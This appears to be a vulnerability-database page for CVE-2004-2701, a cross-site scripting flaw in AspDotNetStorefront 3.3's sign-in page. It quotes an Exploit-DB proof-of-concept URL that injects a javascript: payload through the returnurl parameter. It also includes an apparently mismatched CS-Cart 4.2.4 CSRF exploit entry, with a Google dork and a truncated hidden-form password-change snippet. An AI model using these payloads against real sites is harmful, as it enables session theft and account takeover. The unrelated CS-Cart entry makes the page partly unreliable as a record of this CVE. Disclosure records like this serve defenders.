CVE-2004-2701
Published: 2004-12-31
Priority: P4 17 | medium | 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.51% (71.2th percentile)
Cross-site scripting (XSS) vulnerability in signin.aspx for AspDotNetStorefront 3.3 allows remote attackers to inject arbitrary web script or HTML via the returnurl parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aspdotnetstorefront | aspdotnetstorefront | — | — |
No detection rules found.
Exploit-DB
CS-Cart 4.2.4 - Cross-Site Request Forgery
exploitdb·2015-03-11
CVE-2015-2701 CS-Cart 4.2.4 - Cross-Site Request Forgery
---
# Exploit Title: CS-Cart 4.2.4 CSRF
# Google Dork: intext:"© 2004-2015 Simtech"
# Date: March 11, 2015
# Exploit Author: Luis Santana
# Vendor Homepage: http://cs-cart.com
# Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate
# Version: 4.2.4
# Tested on: Linux + PHP
# CVE : [if one exists, or other VDB reference]
Standard CSRF, allows you to change a user's password. Fairly lame but I noticed no one had reported this bug yet.
Exploit pasted below and attached.
CS-CART CSRF 0day Exploit
/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden">
document.getElementById("CSRF").submit();
Luis Santana - Security+
Administrator - http:/
Exploit-DB
AspDotNetStorefront 3.3 - 'ReturnURL' Cross-Site Scripting
exploitdb·2004-06-09
CVE-2004-2701 AspDotNetStorefront 3.3 - 'ReturnURL' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/10507/info
AspDotNetStorefront is prone to a cross-site scripting vulnerability. This issue exists due to insufficient sanitization of user-supplied data. The problem presents itself in the 'returnurl' parameter of the 'signin.aspx' script of the application and can allow remote attackers to steal cookie-based authentication credentials and carry out other attacks.
AspDotNetStorefront 3.3 is reportedly affected by this issue; however, it is possible that other versions are affected as well.
http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=1"style="background:url(javascript:alert('Vulnerable_To_XSS'))"%20"
http://www.example.com/aspdotnetcart/admin/signin.aspx?retu
No writeups or analysis indexed.
References
http://archives.neohapsis.com/archives/bugtraq/2004-06/0129.html
http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0229.html
http://secunia.com/advisories/11839
http://www.securityfocus.com/bid/10507
https://exchange.xforce.ibmcloud.com/vulnerabilities/16426